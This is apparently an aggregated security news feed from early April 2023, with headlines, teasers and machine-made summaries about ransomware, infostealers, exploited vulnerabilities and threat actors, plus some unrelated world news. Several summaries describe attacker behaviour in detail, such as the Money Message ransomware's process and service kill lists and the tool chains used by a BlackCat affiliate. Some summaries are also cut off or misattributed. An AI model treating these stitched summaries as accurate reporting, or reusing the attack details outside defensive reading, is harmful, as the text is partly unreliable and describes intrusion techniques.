                Autosummary: A month later, the infamous Emotet botnet was observed sending out an SFX archive that, once opened by a user, would automatically extract a second password-protected SFX archive, enter the password, and execute its content without further user interaction using a batch script.


                Google TAG Warns of North Korean-linked ARCHIPELAGO Cyberattacks

                ciber
                2023-04-05 https://thehackernews.com/2023/04/google-tag-warns-of-north-korean-linked.html
                A North Korean government-backed threat actor has been linked to attacks targeting government and military personnel, think tanks, policy makers, academics, and researchers in South Korea and the U.S. Google's Threat Analysis Group (TAG) is tracking the cluster under the name ARCHIPELAGO, which it said is a subset of another threat group tracked by Mandiant under the name APT43. The tech giant



                HP would take up to 90 days to fix a critical bug in some business-grade printers

                exploits
                2023-04-05 https://securityaffairs.com/144470/security/hp-printers-critical-flaw-cve-2023-1707.html

                HP would take up to 90 days to address a critical flaw, tracked as CVE-2023-1707, that resides in the firmware of some business-grade printers. HP is aware of a critical vulnerability, tracked as CVE-2023-1707 (CVSS v3.1 score 9.1), that affects tens of HP Enterprise LaserJet and HP LaserJet Managed Printers models. The exploitation of the […]

                The post HP would take up to 90 days to fix a critical bug in some business-grade printers appeared first on Security Affairs.



                CISA JCDC Will Focus on Energy Sector

                industry
                2023-04-05 https://securityaffairs.com/144466/security/cisa-jddc-energy-sector.html

                CISA's Joint Cyber Defense Collective (JCDC) initiative is going to build operation plans for protecting and responding to cyber threats. What comes to mind when you think of cyber criminals? Depending on who you ask, you’ll get a variety of answers. For some, a cyber criminal matches some of the Hollywood tropes: a […]

                The post CISA JCDC Will Focus on Energy Sector appeared first on Security Affairs.

                Autosummary: About the Author: Michael Sanchez, CEO (CISA), has over 35 years of experience in information technology, cybersecurity, physical security, risk, compliance, and audit.


                Brazil kindergarten attack: Man kills four children in Blumenau

                latam
                2023-04-05 https://www.bbc.co.uk/news/world-latin-america-65192957?at_medium=RSS&at_campaign=KARANGA
                A man armed with a hatchet forced his way into a kindergarten in the city of Blumenau in southern Brazil.



                Tax preparation and e-file service eFile.com compromised to serve malware

                exploits
                2023-04-05 https://securityaffairs.com/144477/malware/efile-com-compromised-serve-malware.html

                The eFile.com online service, the personal tax preparation and e-file service authorized by the US Internal Revenue Service (IRS), was spotted serving malware to visitors. The service helps taxpayers to file tax returns; experts reported that […]

                The post Tax preparation and e-file service eFile.com compromised to serve malware appeared first on Security Affairs.



                New dark web market STYX focuses on financial fraud services

                financial
                2023-04-05 https://www.bleepingcomputer.com/news/security/new-dark-web-market-styx-focuses-on-financial-fraud-services/
                A new dark web marketplace called STYX launched earlier this year and appears to be on its way to becoming a thriving hub for buying and selling illegal services or stolen data. [...]

                Autosummary: Among the services provided are money laundering, identity theft, distributed denial-of-service (DDoS), bypassing two-factor authentication (2FA), fake or stolen IDs and other personal data, renting malware, using cash-out services, email and telephone flooding, identity lookup, and much more.


                Typhon info-stealing malware devs upgrade evasion capabilities

                exploits
                2023-04-05 https://www.bleepingcomputer.com/news/security/typhon-info-stealing-malware-devs-upgrade-evasion-capabilities/
                The developers of the Typhon info-stealer announced on a dark web forum that they have updated the malware to a major version they advertise as "Typhon Reborn V2" [...]

                Autosummary: String deobfuscation (Cisco). The researchers noticed a more comprehensive mechanism for avoiding the infection of analysis machines, with the malware now looking at a wider range of criteria, including usernames, CPUIDs, applications, processes, debugger/emulation checks, and geolocation data before running the malicious routines.


                Fake ransomware demands payment without actually encrypting files

                exploits ransomware
                2023-04-05 https://www.malwarebytes.com/blog/news/2023/04/fake-ransomware-demands-payment-without-actually-encrypting-files

                Categories: News

                Tags: ransomware, fake, faker, fraud, scam, bogus, midnight

                We take a look at a ransomware group that doesn't produce any ransomware, only threats.

                The post Fake ransomware demands payment without actually encrypting files appeared first on Malwarebytes Labs.

                Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. If your incident response consists of opening up one of these missives, panicking, and racing to pay fraudsters, it could end up being a very costly and needless mistake. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.


                Nexx bugs allow to open garage doors, and take control of alarms and plugs

                exploits
                2023-04-05 https://securityaffairs.com/144488/iot/nexx-smart-devices-flaws.html

                A series of vulnerabilities in multiple smart devices manufactured by Nexx can be exploited to remotely open garage doors, and take control of alarms and plugs. In late 2022, the researcher Sam Sabetan discovered a series of critical vulnerabilities in several smart devices manufactured by Nexx, including Smart Garage Door Openers, Alarms, and Plugs. A […]

                The post Nexx bugs allow to open garage doors, and take control of alarms and plugs appeared first on Security Affairs.

                Autosummary: The researchers reported the issues to the United States Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA), which assigned the following five CVEs:

                Use of Hard-coded Credentials, CWE-798 (CVE-2023-1748, CVSS 3.0: 8.6)
                Authorization Bypass Through User-Controlled Key, CWE-639 (CVE-2023-1749, CVSS 3.0: 6.5)
                Authorization Bypass Through User-Controlled Key, CWE-639 (CVE-2023-1750, CVSS 3.0: 7.1)
                Improper Input Validation, CWE-20 (CVE-2023-1751, CVSS 3.0: 7.5)
                Improper Authentication Validation, CWE-287 (CVE-2023-1752, CVSS 3.0: 8.1)


                Streamlining cybersecurity decision-making for analysts and CISOs

                ciber
                2023-04-04 https://www.helpnetsecurity.com/2023/04/04/giorgos-georgopoulos-elemendar-cybersecurity-decision-making/

                Using structured, machine-readable data in defensive systems can present a significant challenge. In this Help Net Security interview, Giorgos Georgopoulos, CEO at Elemendar, discusses these challenges and how Elemendar’s application can help cyber analysts and CISOs. Giorgos highlights the company’s customizable technology, which can be tailored to meet the unique needs of different organizations, as well as the security measures that Elemendar takes to protect the data processed by their AI technology. What are some …

                The post Streamlining cybersecurity decision-making for analysts and CISOs appeared first on Help Net Security.

                Autosummary: That’s because, to use CTI as structured, machine-readable data in a defensive system, you need to translate it from a human-readable form into a machine-readable one: the greatest benefit from cyber threat intelligence comes with higher-level information that is expressed in human-readable forms, because a human wrote it in the first place. Yes, Elemendar’s technology can be customized to meet the specific needs of different organizations at three stages: when integrating the data sources for the application to process, when processing the data inside the application, and when integrating the outputs into an organization’s cyber defense workflows.


                Guardz launches dedicated cybersecurity platform for MSPs and IT professionals

                ciber
                2023-04-04 https://www.helpnetsecurity.com/2023/04/04/guardz-msp-solution/

                Guardz has launched its dedicated cybersecurity platform for MSPs and IT professionals that empowers MSPs to protect their clients with automated remediation plans, to improve their reporting for existing clients and better obtain new ones, and to cut operational and licensing costs up to 75%, ultimately boosting revenue. Cybersecurity attacks aimed at small and mid-size businesses are on the rise, yet only 14% of these companies are prepared to defend themselves. Many either cannot afford …

                The post Guardz launches dedicated cybersecurity platform for MSPs and IT professionals appeared first on Help Net Security.

                Autosummary: These include contracting with multiple vendors, creating an affordable bundled cyber solution for their customers, mastering and deploying a variety of technologies for each client, and demonstrating the risk, exposure, and financial impact to new clients, all while delivering ongoing threat detection and remediation across multiple attack vectors.


                How can organizations bridge the gap between DR and cybersecurity?

                ciber
                2023-04-04 https://www.helpnetsecurity.com/2023/04/04/dr-cybersecurity-teams-integration/

                Breaking down the silos between disaster recovery (DR) and cybersecurity has become increasingly important to ensure maximum business resiliency against outages, data breaches, and ransomware attacks. Yet, many organizations still operate these functions separately, leading to slower response times, budgeting challenges, duplicated resource allocations, and an overall weaker security and business continuity posture. Why must DR and cybersecurity teams collaborate? Encouraging collaboration between your disaster recovery and cybersecurity teams can offer several benefits for your …

                The post How can organizations bridge the gap between DR and cybersecurity? appeared first on Help Net Security.

                Autosummary: By having integrated tools such as security automation platforms, security incident & event management (SIEM), endpoint detection & response (EDR), and data loss prevention (DLP), organizations can dramatically reduce the time it takes for them to detect anomalies or malicious activity on their network, as well as speed up incident response times when needed.


                Virgin Orbit: Richard Branson's rocket firm files for bankruptcy

                financial
                2023-04-04 https://www.bbc.co.uk/news/business-65172594?at_medium=RSS&at_campaign=KARANGA
                The satellite launch company has failed to secure new investment after a rocket launch failed.



                IRS-authorized eFile.com tax return software caught serving JS malware

                exploits
                2023-04-04 https://www.bleepingcomputer.com/news/security/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware/
                eFile.com, an IRS-authorized e-file software service provider used by many for filing their tax returns, has been caught serving JavaScript malware. [...]

                Autosummary: BleepingComputer has obtained the so-called "update.js" and we noticed the fake SSL error message present as base64-encoded HTML code (highlighted below) inside of it:

                Fake SSL error message which is just base64-encoded HTML (BleepingComputer)

                An HTML excerpt from the decoded string generating the fake SSL error is shown below:

                Decoded base64 HTML code generating the fake SSL error message (BleepingComputer)

                The malicious JavaScript file "update.js" further attempts to prompt users to download the next stage payload, depending on whether they are using Chrome


                Arid Viper Hacking Group Using Upgraded Malware in Middle East Cyber Attacks

                exploits
                2023-04-04 https://thehackernews.com/2023/04/arid-viper-hacking-group-using-upgraded.html
                The threat actor known as Arid Viper has been observed using refreshed variants of its malware toolkit in its attacks targeting Palestinian entities since September 2022. Symantec, which is tracking the group under its insect-themed moniker Mantis, said the adversary is "going to great lengths to maintain a persistent presence on targeted networks." Also known by the names APT-C-23 and Desert

                Autosummary: "Arid Gopher, like its predecessor Micropsia, is an info-stealer malware, whose intent is to establish a foothold, collect sensitive system information, and send it back to a C2 (command-and-control) network," Deep Instinct said at the time.


                ALPHV ransomware exploits Veritas Backup Exec bugs for initial access

                exploits ransomware
                2023-04-04 https://www.bleepingcomputer.com/news/security/alphv-ransomware-exploits-veritas-backup-exec-bugs-for-initial-access/
                An ALPHV/BlackCat ransomware affiliate was observed exploiting three vulnerabilities impacting the Veritas Backup product for initial access to the target network. [...]

                Autosummary: Next, they downloaded additional tools on the host like LAZAGNE, LIGOLO, WINSW, RCLONE, and ultimately the ALPHV ransomware encryptor through the Background Intelligent Transfer Service (BITS).


                New Rorschach ransomware is the fastest encryptor seen so far

                exploits ransomware
                2023-04-04 https://www.bleepingcomputer.com/news/security/new-rorschach-ransomware-is-the-fastest-encryptor-seen-so-far/
                Following a cyberattack on a U.S.-based company, malware researchers discovered what appears to be a new ransomware strain with "technically unique features," which they named Rorschach. [...]

                Autosummary: Rorschach details: Researchers at cybersecurity company Check Point, responding to an incident at a company in the U.S., found that Rorschach was deployed using the DLL side-loading technique via a signed component in Cortex XDR, the extended detection and response product from Palo Alto Networks.


                Prevent and detect Adobe ColdFusion exploitation (CVE-2023-26360, CVE-2023-26359)

                exploits
                2023-04-04 https://www.helpnetsecurity.com/2023/04/04/exploitation-cve-2023-26360-cve-2023-26359/

                When Adobe released security updates for its ColdFusion application development platform last month, it noted that one of the vulnerabilities (CVE-2023-26360) had been exploited in the wild “in very limited attacks.” Were your servers among those hit? And what should you do if they were?

                About CVE-2023-26360 (and CVE-2023-26359)

                CVE-2023-26360 is an improper access control vulnerability that could result in arbitrary code execution in the context of the current user, and was reported to Adobe …

                The post Prevent and detect Adobe ColdFusion exploitation (CVE-2023-26360, CVE-2023-26359) appeared first on Help Net Security.



                Rorschach Ransomware Emerges: Experts Warn of Advanced Evasion Strategies

                exploits ransomware
                2023-04-04 https://thehackernews.com/2023/04/rorschach-ransomware-emerges-experts.html
                Cybersecurity researchers have taken the wraps off a previously undocumented ransomware strain called Rorschach that's both sophisticated and fast. "What makes Rorschach stand out from other ransomware strains is its high level of customization and its technically unique features that have not been seen before in ransomware," Check Point Research said in a new report. "In fact, Rorschach is one

                Autosummary: "The Rorschach ransomware employs a highly effective and fast hybrid-cryptography scheme, which blends the curve25519 and eSTREAM cipher hc-128 algorithms for encryption purposes," researchers Jiri Vinopal, Dennis Yarizadeh, and Gil Gekker explained.


                New Rilide Malware Targeting Chromium-Based Browsers to Steal Cryptocurrency

                exploits
                2023-04-04 https://thehackernews.com/2023/04/new-rilide-malware-targeting-chromium.html
                Chromium-based web browsers are the target of a new malware called Rilide that masquerades itself as a seemingly legitimate extension to harvest sensitive data and siphon cryptocurrency. "Rilide malware is disguised as a legitimate Google Drive extension and enables threat actors to carry out a broad spectrum of malicious activities, including monitoring browsing history, taking screenshots,

                Autosummary: "Rilide malware is disguised as a legitimate Google Drive extension and enables threat actors to carry out a broad spectrum of malicious activities, including monitoring browsing history, taking screenshots, and injecting malicious scripts to withdraw funds from various cryptocurrency exchanges," Trustwave SpiderLabs Research said in a report shared with The Hacker News.


                Rorschach ransomware has the fastest file-encrypting routine to date

                exploits ransomware
                2023-04-04 https://securityaffairs.com/144425/cyber-crime/rorschach-ransomware-fast-encryption.html

                A new ransomware strain named Rorschach ransomware supports the fastest file-encrypting routine observed to date. Check Point Research (CPR) and Check Point Incident Response Team (CPIRT) researchers detected a previously unknown ransomware strain, dubbed Rorschach ransomware, that was employed in an attack against a US-based company. The experts pointed out that the Rorschach ransomware appears to be unique. […]

                The post Rorschach ransomware has the fastest file-encrypting routine to date appeared first on Security Affairs.

                Autosummary: The Rorschach ransomware uses the following files:

                cy.exe – Cortex XDR Dump Service Tool version 7.3.0.16740, abused to side-load winutils.dll
                winutils.dll – Packed Rorschach loader and injector, used to decrypt and inject the ransomware.


                CISA adds Zimbra bug exploited in attacks against NATO countries to its Known Exploited Vulnerabilities catalog

                exploits
                2023-04-04 https://securityaffairs.com/144416/hacking/known-exploited-vulnerabilities-catalog-zimbra.html

                US CISA has added a Zimbra flaw, which was exploited in attacks targeting NATO countries, to its Known Exploited Vulnerabilities catalog U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a Zimbra flaw, tracked as CVE-2022-27926, to its Known Exploited Vulnerabilities Catalog. The CVE-2022-27926 flaw affects Zimbra Collaboration version 9.0.0, which is used to host publicly-facing […]

                The post CISA adds Zimbra bug exploited in attacks against NATO countries to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.




                HP to patch critical bug in LaserJet printers within 90 days

                exploits
                2023-04-04 https://www.bleepingcomputer.com/news/security/hp-to-patch-critical-bug-in-laserjet-printers-within-90-days/
                HP announced in a security bulletin this week that it would take up to 90 days to patch a critical-severity vulnerability that impacts the firmware of certain business-grade printers. [...]



                2023 State of Malware Report: What the channel needs to know to stay ahead of threats

                exploits government
                2023-04-04 https://www.malwarebytes.com/blog/business/2023/04/top-5-cyberthreats-facing-msps-and-vars-in-2023

                Categories: Business

                There are 5 cyberthreats for channel partners to focus on in 2023.


                The post 2023 State of Malware Report: What the channel needs to know to stay ahead of threats appeared first on Malwarebytes Labs.


                Autosummary: The channel, comprising managed service providers (MSPs), Systems Integrators (SIs), value-added resellers (VARs), and more, plays a vital role in providing cybersecurity for companies around the globe today.


                Pre-ransomware notifications are paying off right from the bat

                exploits
                2023-04-04 https://www.malwarebytes.com/blog/news/2023/04/pre-ransomware-notifications-are-paying-off-right-from-the-bat

                Categories: News

                Categories: Ransomware

                Tags: pre-ransomware notifications

                Tags: JCDC

                Tags: CISA

                Tags: ransomware

                Tags: IRS

                Tags: Emotet

                Tags: MDR

                CISA has published the first results of its pre-ransomware notifications that were introduced at the start of 2023. And they appear to be working.


                The post Pre-ransomware notifications are paying off right from the bat appeared first on Malwarebytes Labs.


                Autosummary: Even though this initiative is relatively young, CISA says it has notified over 60 entities across the energy, healthcare, water/wastewater, education, and other sectors about potential pre-ransomware intrusions, and we’ve confirmed that many of them identified and remediated the intrusion before encryption or data loss occurred. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The success of the operation relies on a few key factors: sharing intelligence by the cybersecurity research community, infrastructure providers, and cyber threat intelligence companies about potential early-stage ransomware activity.


                Trace3 acquires Set Solutions to boost cybersecurity capabilities

                ciber
                2023-04-04 https://www.helpnetsecurity.com/2023/04/05/trace3-set-solutions/

                Trace3’s acquisition of Set Solutions is a continuation of the company’s strategic expansion plan. The investment allows the combined companies to deepen cybersecurity capabilities to drive success for commercial and enterprise clients. Set Solutions has a longstanding history of alleviating challenges that technology leaders encounter in the ongoing evolution of the cyber threat landscape. Trace3’s security portfolio is strengthened by Set Solutions’ specialized expertise in cybersecurity and focus on mature and emerging technology-based solutions. This … More

                The post Trace3 acquires Set Solutions to boost cybersecurity capabilities appeared first on Help Net Security.




                ALPHV/BlackCat ransomware affiliate targets Veritas Backup solution bugs

                exploits ransomware
                2023-04-04 https://securityaffairs.com/144438/cyber-crime/alphv-blackcat-ransomware-veritas-flaws.html

                An ALPHV/BlackCat ransomware affiliate was spotted exploiting vulnerabilities in the Veritas Backup solution. An affiliate of the ALPHV/BlackCat ransomware gang, tracked as UNC4466, was observed exploiting three vulnerabilities in the Veritas Backup solution to gain initial access to the target network. Unlike other ALPHV affiliates, UNC4466 doesn’t rely on stolen credentials for initial access to victim environments. Mandiant […]

                The post ALPHV/BlackCat ransomware affiliate targets Veritas Backup solution bugs appeared first on Security Affairs.


                Autosummary: Then the threat actor used the Background Intelligent Transfer Service (BITS) to download additional tools such as LAZAGNE, LIGOLO, WINSW, RCLONE, and finally the ALPHV ransomware encryptor.


                Mexico migrant centre fire: “They didn’t deserve to die this way”

                latam
                2023-04-03 https://www.bbc.co.uk/news/world-latin-america-65148023?at_medium=RSS&at_campaign=KARANGA
                There is growing outrage over a fire which killed at least 39 people at a migrant centre in Mexico.



                Malware and machine learning: A match made in hell

                exploits
                2023-04-03 https://www.helpnetsecurity.com/2023/04/03/machine-learning-malware/

                We’ve been developing machine learning-based cybersecurity systems for many years and began developing automation for analysis in our labs in 2005. These early automation projects have since evolved into full-blown machine-learning frameworks. Since then, we’ve been waiting for our enemies to make the same move, and after 18 years, the wait is over – malware with artificial intelligence has arrived. Defenders have been able to automate their work for some time, enabling excellent detection, analysis … More

                The post Malware and machine learning: A match made in hell appeared first on Help Net Security.


                Autosummary: However, deep fakes of real people are something different altogether, and while abuse of deep fake images, voices and videos is, thus far, relatively small in scale, there is no doubt that this will get worse. Automated malware campaigns will drastically change the reaction speed of malware gangs. The technology to run malware campaigns and automatically bypass new defenses is most definitely doable nowadays, but thus far, we haven’t seen anything of the kind.


                Malwarebytes unveils WorldBytes to help users reveal the hidden cyber threats around them

                exploits
                2023-04-03 https://www.helpnetsecurity.com/2023/04/03/malwarebytes-worldbytes/

                Malwarebytes launched WorldBytes, a next-generation mobile security application that takes the malware scanning technologies that customers know and love and applies them to the first frontier of human evolution: real life interactions. Powered by Malwarebytes and AI technology, WorldBytes empowers users to use their mobile devices to scan the world around them and get real-time threat assessments of anything and everything – including questionable Tinder dates, the unlabeled sauce at the back of their fridge … More

                The post Malwarebytes unveils WorldBytes to help users reveal the hidden cyber threats around them appeared first on Help Net Security.




                Crypto-Stealing OpcJacker Malware Targets Users with Fake VPN Service

                exploits
                2023-04-03 https://thehackernews.com/2023/04/crypto-stealing-opcjacker-malware.html
                A piece of new information-stealing malware called OpcJacker has been spotted in the wild since the second half of 2022 as part of a malvertising campaign. "OpcJacker’s main functions include keylogging, taking screenshots, stealing sensitive data from browsers, loading additional modules, and replacing cryptocurrency addresses in the clipboard for hijacking purposes," Trend Micro researchers

                Autosummary: NullMixer also stands out for simultaneously dropping a wide variety of off-the-shelf malware, including PseudoManuscrypt, Raccoon Stealer, GCleaner, Fabookie, and a new malware loader referred to as Crashtech Loader, leading to large-scale infections.


                Capita cyberattack disrupted access to its Microsoft Office 365 apps

                ciber
                2023-04-03 https://www.bleepingcomputer.com/news/security/capita-cyberattack-disrupted-access-to-its-microsoft-office-365-apps/
                British outsourcing services provider Capita announced today that a cyberattack on Friday prevented access to its internal Microsoft Office 365 applications. [...]

                Autosummary: “The issue was limited to parts of the Capita network, and there is no evidence of customer, supplier, or colleague data having been compromised” – Capita. Capita says that the disruption only affected some services provided to individual clients, while most of its customer base didn’t experience any adverse impacts.


                LogRhythm releases new cybersecurity capabilities to improve operational efficiency

                ciber
                2023-04-03 https://www.helpnetsecurity.com/2023/04/03/logrhythm-cybersecurity-capabilities/

                For a fourth consecutive quarter, LogRhythm releases new cybersecurity capabilities that make it easier for security teams to reduce noise, prioritize work and quickly secure their environments. Analysts gain a simplified experience to focus on detecting, investigating, and responding to threats. In its continued commitment to customer satisfaction, LogRhythm also announces the Unlimited Upgrades Service by the Professional Services team, which assists customers in upgrading to every quarterly SIEM release with ease. “LogRhythm is proud … More

                The post LogRhythm releases new cybersecurity capabilities to improve operational efficiency appeared first on Help Net Security.




                Microsoft fixed Azure AD bug that led to Bing.com results manipulation and account takeover

                exploits
                2023-04-03 https://securityaffairs.com/144379/hacking/microsoft-fixed-azure-ad-bug.html

                Microsoft addressed a misconfiguration flaw in the Azure Active Directory (AAD) identity and access management service. Microsoft has addressed a misconfiguration issue impacting the Azure Active Directory (AAD) identity and access management service that exposed multiple Microsoft applications, including the Bing management portal, to unauthorized access. The vulnerability was discovered by Wiz Research which determined […]

                The post Microsoft fixed Azure AD bug that led to Bing.com results manipulation and account takeover appeared first on Security Affairs.


                Autosummary: Below is the disclosure timeline: Jan. 31, 2023 – Wiz Research reported the Bing issue to MSRC; Jan. 31, 2023 – MSRC issues initial fix to Bing app; Feb. 25, 2023 – Wiz Research reported the other vulnerable applications to MSRC; Feb. 27, 2023 – MSRC starts issuing fixes for said applications; Mar. 20, 2023 –


                US seizes $112 million from cryptocurrency investment scammers

                financial
                2023-04-03 https://www.bleepingcomputer.com/news/security/us-seizes-112-million-from-cryptocurrency-investment-scammers/
                Today, the U.S. Department of Justice seized six virtual currency accounts containing over $112 million in funds stolen in cryptocurrency investment schemes. [...]

                Autosummary: The criminals behind these cryptocurrency fraud scams (also known as pig butchering or cryptocurrency confidence scams) approach their victims via various dating platforms, messaging apps, or social media platforms, build trust, and introduce them to investment schemes which eventually allow them to empty the targets’ crypto wallets.


                Ransomware as a service? Windows users can still fight back.

                exploits
                2023-04-03 https://www.computerworld.com/article/3692550/ransomware-as-a-service-windows-users-can-still-fight-back.html#tk.rss_security

                Ransomware.

                It’s one word that can strike a chill in anyone from a corporate C-suite to a home user. It’s sometimes hard to get a feel for the overall ransomware industry (and yes, it’s now an industry). But based on anecdotal reviews of forums and social media, it appears as though attacks against individuals are slowing. I no longer see people report they’ve been hit by ransomware on their PCs.

                But it may be that attackers have realized that going after “one-off” targets isn’t the best business plan. In fact, in a recent Microsoft Secure online seminar (registration required), Jessica Payne and Geoff McDonald discuss how ransomware is now a big business, offered as a service by those who sell access to compromised networks to others.



                Autosummary: “With this change, when users open a file that came from the internet, such as an email attachment, and that file contains macros, there will be a red notice shown at the top of the opened file.” Even if you’re not a Microsoft 365 Defender customer, you can deploy ASR rules; the specific rule that targets ransomware processes: Block executable files from running unless they meet a prevalence, age, or trusted list criterion.


                CISA warns of Zimbra bug exploited in attacks against NATO countries

                exploits
                2023-04-03 https://www.bleepingcomputer.com/news/security/cisa-warns-of-zimbra-bug-exploited-in-attacks-against-nato-countries/
                The Cybersecurity and Infrastructure Security Agency (CISA) warned federal agencies to patch a Zimbra Collaboration (ZCS) cross-site scripting flaw exploited by Russian hackers to steal emails in attacks targeting NATO countries. [...]



                China to probe Micron over cybersecurity, in chip war’s latest battle

                ciber
                2023-04-03 https://www.computerworld.com/article/3692435/china-to-probe-micron-over-cybersecurity-in-chip-war-s-latest-battle.html#tk.rss_security

                The Chinese government is instituting a cybersecurity review of US-based memory chip maker Micron’s products being sold in the country, in the latest move in the ongoing semiconductor trade dispute that pits China against the US and its allies.

                The rupture between China and the West over semiconductors is causing chip supply chain disruptions that threaten many of the fastest-growing parts of the technology sector – mainly AI and cloud technology. The chip war is also putting global enterprises in the crosshairs, as auto manufacturing and a host of other sectors are increasingly dependent on the availability of advanced silicon for growth.



                Autosummary: China states concern over national security. A brief Chinese government statement issued on March 31 said that the review of Micron is being undertaken “in order to ensure the security of the key information infrastructure supply chain, prevent network security risks caused by hidden product problems, and maintain national security,” according to a machine translation of the announcement.


                New macOS malware steals sensitive info, including a user’s entire Keychain database

                exploits
                2023-04-03 https://www.malwarebytes.com/blog/news/2023/04/new-macos-malware-yoinks-a-trove-of-sensitive-information-including-a-users-entire-keychain-database

                Categories: Apple

                Categories: News

                Tags: MacStealer

                Tags: mac infostealer

                Tags: information stealer

                Tags: Apple

                Tags: Thomas Reed

                Tags: iCloud Keychain

                MacStealer could be an infamous stealer in the making, but right now, it needs improvement, according to Malwarebytes expert.


                The post New macOS malware steals sensitive info, including a user’s entire Keychain database appeared first on Malwarebytes Labs.


                Autosummary: The malware then proceeds to collect and save the following, also within the TMP folder: account passwords, browser cookies, and stored credit card details in Firefox, Chrome, and Brave; cryptocurrency wallets (Binance, Coinomi, Exodus, Keplr Wallet, Martian Wallet, MetaMask, Phantom, Tron, Trust Wallet); the Keychain database in its encoded (base64) form; the Keychain password in text format; various files (.TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .PPT, .PPTX, .JPG, .PNG, .CVS, .BMP, .MP3, .ZIP, .RAR, .PY, .DB); and system information in text form. MacStealer also compresses everything it stole in a ZIP file and sends it to remote C&C servers for the threat actor to collect later.


                Super FabriXss: an RCE vulnerability in Azure Service Fabric Explorer

                exploits
                2023-04-03 https://www.malwarebytes.com/blog/news/2023/04/super-fabrixss-an-rce-vulnerability-in-azure-service-fabric-explorer

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Azure

                Tags: Microsoft

                Tags: Super FabriXss

                Tags: RCE

                Tags: vulnerability

                Tags: CVE-2023-23383

                Researchers disclosed how they found a remote code execution vulnerability in Azure Service Fabric Explorer.


                The post Super FabriXss: an RCE vulnerability in Azure Service Fabric Explorer appeared first on Malwarebytes Labs.


                Autosummary: By trying some simple HTML code like an H1 tag, which is often used to display the main topic on a web page in a larger font size, they found that clicking on Cluster in the options on the Events tab resulted in the new title being displayed as a large title, due to the effect of the <h1> tag. Image courtesy of Orca Security. While this is no serious attack, it shows that there are ways to circumvent the input sanitization that takes place, or should take place, and it might be possible to inject more complex HTML code.


                Leaked documents from Russian firm NTC Vulkan show Sandworm cyberwarfare arsenal

                rusia-ucrania ciber
                2023-04-02 https://securityaffairs.com/144340/apt/ntc-vulkan-sandworm-cyberwarfare-arsenal.html

                Files leaked by Russian IT contractor NTC Vulkan show that Russia-linked Sandworm APT requested it to develop offensive tools. Documents leaked from Russian IT contractor NTC Vulkan show it was likely involved in the development of offensive tools. The documents demonstrate that it also developed hacking tools for the Russia-linked APT group Sandworm. The Sandworm group […]

                The post Leaked documents from Russian firm NTC Vulkan show Sandworm cyberwarfare arsenal appeared first on Security Affairs.


                Autosummary: In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe.


                New Money Message ransomware demands million dollar ransoms

                financial exploits ransomware
                2023-04-02 https://www.bleepingcomputer.com/news/security/new-money-message-ransomware-demands-million-dollar-ransoms/
                A new ransomware gang named "Money Message" has appeared, targeting victims worldwide and demanding million-dollar ransoms not to leak data and release a decryptor. [...]

                Autosummary: to clear shadow volume copies. The ransomware will then terminate the following processes: sql.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, encsvc.exe, firefox.exe, tbirdconfig.exe, mdesktopqos.exe, ocomm.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, vmms.exe, vmwp.exe. Next, the ransomware shuts down the following Windows services: vss, sql, svc$, memtas, mepocs, sophos, veeam, backup, vmms. When encrypting files, it will not append any extension, but this can change depending on the victim.


                Cacti, Realtek, and IBM Aspera Faspex Vulnerabilities Under Active Exploitation

                exploits
                2023-04-01 https://thehackernews.com/2023/04/cacti-realtek-and-ibm-aspera-faspex.html
                Critical security flaws in Cacti, Realtek, and IBM Aspera Faspex are being exploited by various threat actors in hacks targeting unpatched systems. This entails the abuse of CVE-2022-46169 (CVSS score: 9.8) and CVE-2021-35394 (CVSS score: 9.8) to deliver MooBot and ShellBot (aka PerlBot), Fortinet FortiGuard Labs said in a report published this week. CVE-2022-46169 relates to a critical

                Autosummary: The bug, patched in December 2022 (version 4.4.2 Patch Level 2), has been co-opted by cybercriminals in ransomware campaigns associated with Buhti and IceFire since February, shortly after the release of the proof-of-concept (PoC) exploit.


                Hackers Exploiting WordPress Elementor Pro Vulnerability: Millions of Sites at Risk!

                exploits
                2023-04-01 https://thehackernews.com/2023/04/hackers-exploiting-wordpress-elementor.html
                Unknown threat actors are actively exploiting a recently patched security vulnerability in the Elementor Pro website builder plugin for WordPress. The flaw, described as a case of broken access control, impacts versions 3.11.6 and earlier. It was addressed by the plugin maintainers in version 3.11.7 released on March 22. "Improved code security enforcement in WooCommerce components," the

                Autosummary: "This makes it possible for a malicious user to turn on the registration page (if disabled) and set the default user role to administrator so they can create an account that instantly has the administrator privileges," Patchstack said in an alert of March 30, 2023.


                DISH slapped with multiple lawsuits after ransomware cyber attack

                exploits ransomware
                2023-04-01 https://www.bleepingcomputer.com/news/security/dish-slapped-with-multiple-lawsuits-after-ransomware-cyber-attack/
                Dish Network has been slapped with multiple class action lawsuits after it suffered a ransomware incident that was behind the company’s multi-day "network outage." The legal actions aim to recover losses faced by DISH investors who were adversely affected by what has been dubbed a "securities fraud." [...]

                Autosummary: In the days following the disclosure, DISH continued to struggle to bring its IT systems and its website, Dish.com, back up (DISH Network websites faced a multi-week network outage, per BleepingComputer). Following the news of the Dish ransomware attack, the Network’s stock price fell $0.79 per share, "or 6.48%, to close at $11.41 per share on February 28, 2023," states the complaint.


                Microsoft Fixes New Azure AD Vulnerability Impacting Bing Search and Major Apps

                exploits
                2023-04-01 https://thehackernews.com/2023/04/microsoft-fixes-new-azure-ad.html
